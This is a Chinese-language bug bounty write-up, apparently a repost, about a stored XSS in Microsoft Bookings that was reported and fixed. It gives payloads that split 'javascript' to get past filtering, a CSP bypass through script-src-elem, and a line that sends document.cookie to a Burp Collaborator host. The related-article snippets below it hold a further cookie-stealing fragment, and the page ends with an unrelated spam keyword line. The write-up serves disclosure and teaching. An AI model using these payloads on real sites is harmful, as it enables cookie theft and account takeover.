<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    記一次Microsoft服務預訂中的存儲型XSS漏洞挖掘

    VSole2023-01-06 11:43:23

    一個美好的一天,我在我的辦公室工作,我收到了同事的日歷邀請。在查看電子郵件時,我發現了 Microsoft 的新服務預訂(實際上是舊的,但對我來說是新的)。Microsoft booking 允許任何人預訂服務/日歷時段。

    此應用程序有兩個界面,一個是內部界面,另一個是面向公眾的服務頁面。我決定深入檢查這個應用程序。我去內部預訂頁面開始新的預訂,而預訂服務發現了一個參數消息/注釋。

    我嘗試插入各種 XSS payload 來觸發 xss 但沒有成功。

    經分析,發現應用程序允許用戶插入鏈接或 標簽。

    現在我的注意力轉移到了這個標簽上。我使用谷歌為我的攻擊向量找到了完美的有效載荷,我發現可以使用 href 值利用 ancher 標簽。

    應用程序有各種保護機制來防止腳本的執行。但是當我將 javascript word 分解為 javas cript 應用程序時,它接受了這個payload。

    現在,當用戶單擊預訂消息中提供的鏈接時,此payload將被執行。我非常興奮。

    <a href="javas   cript:alert('document.domain')">XSSa>
    

    但是當我將payload更新為

    <a href=”javas cript:alert(document.cookie)” >Testing.com a>
    

    我收到帶有 cookie 未定義消息的彈出消息,這意味著應用程序具有 csp 保護。

    所以我們更新了我們的有效負載以繞過 csp 保護。注入使用script-src-elemCSP 中的指令。該指令允許您僅定位script元素。使用此指令,您可以覆蓋現有script-src規則,使您能夠注入unsafe-inline,從而允許您使用內聯腳本。

    <a href=”javas cript:alert(document.cookie)”&token=;script-src-elem%20%27unsafe-inline%27 >Testing.com a>
    

    令我驚訝的是,我能夠使用 xss 獲取 cookie。現在我想將這些 cookie 傳遞到我的服務器。所以我啟動了 burp collaborator 并將payload更新為

    document
    .location=’http://l4q4dgmomxzkw6i13q5essmojfp6hu6.burpcollaborator.net/cookiestealer.php?c='+document.cookie"&token=;script-src-elem%20%27unsafe-inline%27 >Testing.com 
    

    在這里,我在一個標簽中使用了 document.location,該標簽將用戶重定向到另一個頁面并共享 cookie。

    現在我想提交此錯誤,但由于我是來自同一組織的經過身份驗證的用戶,因此影響很小。

    因此,我嘗試從公開的服務發起相同的攻擊,并且無需身份驗證即可執行相同的攻擊。

    現在,由于我是未經身份驗證的用戶/攻擊者,嚴重性從低/中到高。

    我很快將這個錯誤提交給微軟團隊,微軟的人很快就解決了這個問題,是的,他們因為這個漏洞獎勵了我幾千美金的漏洞賞金。

    感謝 Microsoft 安全團隊在修復此問題期間提供的大力幫助。

    漏洞挖掘xss
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    跨站腳本英文全稱(Cross Site Scripting跨站腳本),為了不和css層疊樣式表(英文全稱:Cascading Style Sheets)混淆,因此將跨站腳本縮寫為XSS。本期我們講解一下XSS漏洞原理和利用檢測。
    ezXSS介紹ezXSS是一款用于滲透測試和漏洞挖掘XSS盲測跨站腳本工具。在演示版本中可能禁用了一些特性。
    但當存在存儲型XSS時,受害者打開此URL,攻擊代碼將會被觸發,這種情況下便稱之為存儲型XSS漏洞。在標題處和帖子內容中分別填寫payload,填寫好之后,應與下圖一致填寫好內容之后,點擊下方的發表按鈕,即可進行發帖,發帖成功會彈出一個提示成功,如下圖所示?????
    xsshelp閑著沒事隨便寫的一個輔助挖掘xss漏洞的工具xsshelp version: 1.0.0Usage: [-ut] [-u url] [-t thread] [-h help]Options: -h this help -t intthread Num -u string a target url
    我發現了一個存儲的XSS漏洞,我可以通過竊取cookie升級為帳戶接管。我的payload目前需要最少的用戶交互,只需單擊即可。之后,向下滾動并單擊取消預約。確保您攔截了此請求。使用以下有效載荷添加消息:"><xss/id="1"/tabindex="1"/onfocusin="window.location.>您通常會收到一個確認框,確認您的預約已取消,單擊確定。即使管理員注銷,此cookie也可以輕松重用。這是因為cookie不會過期。影響我能夠通過取消我們的預約并包含一條消息來接管一個管理員帳戶。這意味著我們必須找到一個具有用戶交互的。
    在查看電子郵件時,我發現了 Microsoft 的新服務預訂。Microsoft booking 允許任何人預訂服務/日歷時段。此應用程序有兩個界面,一個是內部界面,另一個是面向公眾的服務頁面。我決定深入檢查這個應用程序。我嘗試插入各種 XSS payload 來觸發 xss 但沒有成功。現在我的注意力轉移到了這個標簽上。應用程序有各種保護機制來防止腳本的執行。
    在這篇文章中,我將討論 Microsoft Forms 中反射式跨站點腳本 漏洞的詳細信息。它允許用戶創建表單和調查,與他人共享,并在集中位置收集響應。但是,我們發現可以將惡意JavaScript代碼注入表單中,這些代碼可以由毫無戒心的用戶執行。我遵循了 MSRC 報告漏洞的準則并提交了我的發現。欲了解更多信息,請參閱:向 MSRC 提交報告的示例 https://www.microsoft.com/en-us/msrc/bounty-example-report-submission微軟賞金計劃 |微軟公司 https://www.microsoft.com/en-us/msrc/bounty?
    每個黑客都會遇到這個,第一個賞金。我實際上無法解釋它的感覺,但我知道你們中的大多數人都能理解它的感覺。當我們開始在 Web 應用程序安全中進行漏洞賞金時,我們大多數人都會從 XSS開始,故事從這里開始。
    記一次NFT平臺的存儲型XSS和IDOR漏洞這是我在 NFT 市場中發現的一個令人興奮的安全問題,它允許我通過鏈接 IDOR 和 XSS 來接管任何人的帳戶,以實現完整的帳戶接管漏洞。我們能夠用我們自己的價值觀修改受害者用戶的個人資料。現在我們可以提出任何其他請求來執行其他經過身份驗證的操作,例如出售藝術品或轉讓或刪除用戶的藝術品漏洞披露
    大家好,在本文中,我將分享我在2個TikTok資產發現的XSS漏洞。當我決定在TikTok 程序中尋找漏洞 時,我花了1個月的時間尋找這個XSS。當我在TikTok 賣家賬戶上創建產品時,這個 XSS 發現開始了我在賣家賬戶的產品名稱中插入了 XSS payload。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类